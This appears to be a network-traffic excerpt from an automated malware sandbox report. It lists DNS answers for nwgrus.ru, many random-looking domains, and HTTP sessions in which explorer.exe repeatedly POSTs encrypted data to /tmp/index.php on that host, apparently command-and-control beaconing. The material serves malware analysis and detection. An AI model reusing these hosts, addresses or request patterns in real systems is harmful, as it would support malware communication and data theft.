                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru179.52.87.163A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.284629107 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru187.131.253.169A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru179.52.87.163A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru95.86.30.3A (IP address)IN (0x0001)false
                                                                                      Oct 1, 2024 15:19:55.287265062 CEST1.1.1.1192.168.2.40x8010No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                                                      • bhqjnnqelycixny.net
                                                                                        • nwgrus.ru
                                                                                      • puyhtqcmdpxpluct.net
                                                                                      • wcdxuymrcevjnpq.org
                                                                                      • furydiibsxgmyj.com
                                                                                      • riurefweuxr.org
                                                                                      • yduxerbrsufspya.com
                                                                                      • ysuvstjxegoleu.org
                                                                                      • ppentvmtanft.com
                                                                                      • iyujkbbljdajhtr.net
                                                                                      • awdlidomwbvuuhth.com
                                                                                      • nrwpjmrfkgs.org
                                                                                      • ikextycmggavxa.org
                                                                                      • xflbmtqhirja.com
                                                                                      • pyqfoqocstl.com
                                                                                      • dijxohecsahmqya.net
                                                                                      • fkwktqlntyvhlhv.net
                                                                                      • axuolhuhwntg.org
                                                                                      • obobrllwrvxobu.net
                                                                                      • flkhebcbosbhs.org
                                                                                      • sdipfhxrqta.net
                                                                                      • ecqgmfmehrdfesh.net
                                                                                      • cmyvyfvgexcutc.org
                                                                                      • gahrsvlvghgft.com
                                                                                      • dikpavspdxtej.net
                                                                                      • arbcgjbfbud.net
                                                                                      • dhkilweanmi.com
                                                                                      • rvuyclbvwkrg.com
                                                                                      • jqtjcxypgpwnw.net
                                                                                      • bcgwrufdvmvybh.com
                                                                                      • whtwvxqhovvmi.org
                                                                                      • dyfmjstgfwohx.net
                                                                                      • kwsghrqhqvcg.org
                                                                                      • ccplyqsjscjfnfid.org
                                                                                      • lqtuaptcsfhre.org
                                                                                      • dfuclvkubxc.com
                                                                                      • utvluvviohegxwa.org
                                                                                      • gciivaguamcfaiv.net
                                                                                      • pdfnugwkpxwacgj.org
                                                                                      • dxlshxkdsvnwfeb.org
                                                                                      • snihbsmchoau.org
                                                                                      • saahpawkqkmb.com
                                                                                      • nuocycmfgie.org
                                                                                      • vjpuynmuynejyil.com
                                                                                      • sbfilscmpife.com
                                                                                      • nylkqgrfrnt.org
                                                                                      • gnxmthbmvqq.org
                                                                                      • yvujkdpmsqqrh.net
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973678.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:22.451747894 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://bhqjnnqelycixny.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 216
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:22.451772928 CEST216OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 51 b2 99
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA .[k,vu QPq|_\v"Q.~pHe:}0VXa-hx%4+0h VwIUE@
                                                                                      Oct 1, 2024 15:17:23.620310068 CEST152INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:23 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 04 00 00 00 72 e8 86 e9
                                                                                      Data Ascii: r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.44973778.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:23.632148027 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://puyhtqcmdpxpluct.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 345
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:23.632172108 CEST345OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 4e 0d a8 84
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuN!`{}6H/?%5plF0}#<2XJV`6,{we,:s5W6j\U021u`F|BZWAb
                                                                                      Oct 1, 2024 15:17:24.751142979 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:24 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.44973878.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:24.764417887 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://wcdxuymrcevjnpq.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 348
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:24.764436007 CEST348OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5a 38 ea ba
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuZ8nSyav`j$H}?{#pCu$P (!RE?v[S5v%x8V5lARV7l!/nazFushL:6k
                                                                                      Oct 1, 2024 15:17:25.914532900 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:25 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.44973978.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:25.922745943 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://furydiibsxgmyj.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 150
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:25.922774076 CEST150OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 4c 42 d5 e7
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuLB\|tT-L,zS|Ti[YR;-bg8#!cw.v
                                                                                      Oct 1, 2024 15:17:27.029357910 CEST137INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:26 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.44974078.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:27.037231922 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://riurefweuxr.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 148
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:27.037246943 CEST148OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7e 3e b1 ad
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu~>oT^Nt6D|@q=,[SGP%.3v]ATOh
                                                                                      Oct 1, 2024 15:17:28.205945015 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:27 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.44974178.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:28.214375019 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://yduxerbrsufspya.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 277
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:28.214417934 CEST277OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 63 46 df fe
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vucFl%iBS'W7&-igLkO#_N Qq}, g{>FK]TB**J&7%Ck34\jV&iY$
                                                                                      Oct 1, 2024 15:17:29.341069937 CEST137INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:29 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.44974278.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:29.350001097 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://ysuvstjxegoleu.org/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 170
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:29.350030899 CEST170OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 23 29 e5 b8
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vu#)VBV{elCj<zt.`b;S2MQO[JN/?lwg;Ps]d
                                                                                      Oct 1, 2024 15:17:30.500327110 CEST137INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:30 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.44974378.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:30.508013010 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://ppentvmtanft.com/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 126
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:30.508030891 CEST126OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 66 5e d6 e3
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuf^_nbRMonw
                                                                                      Oct 1, 2024 15:17:31.641361952 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:31 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.44974478.89.199.216802580C:\Windows\explorer.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Oct 1, 2024 15:17:31.786107063 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Accept: */*
                                                                                      Referer: http://iyujkbbljdajhtr.net/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                      Content-Length: 326
                                                                                      Host: nwgrus.ru
                                                                                      Oct 1, 2024 15:17:31.786122084 CEST326OUTData Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 43 55 bd 82
                                                                                      Data Ascii: ;n&`&u|bt5oZ]Rm? 9Yt M@NA -[k,vuCUHVdygu-os/x$S;<*J+[Qs9Q?ir_-x|)=>:C2~@{l>wx{V?a
                                                                                      Oct 1, 2024 15:17:33.261308908 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:32 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                      Oct 1, 2024 15:17:33.261368990 CEST484INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.26.0
                                                                                      Date: Tue, 01 Oct 2024 13:17:32 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Connection: close
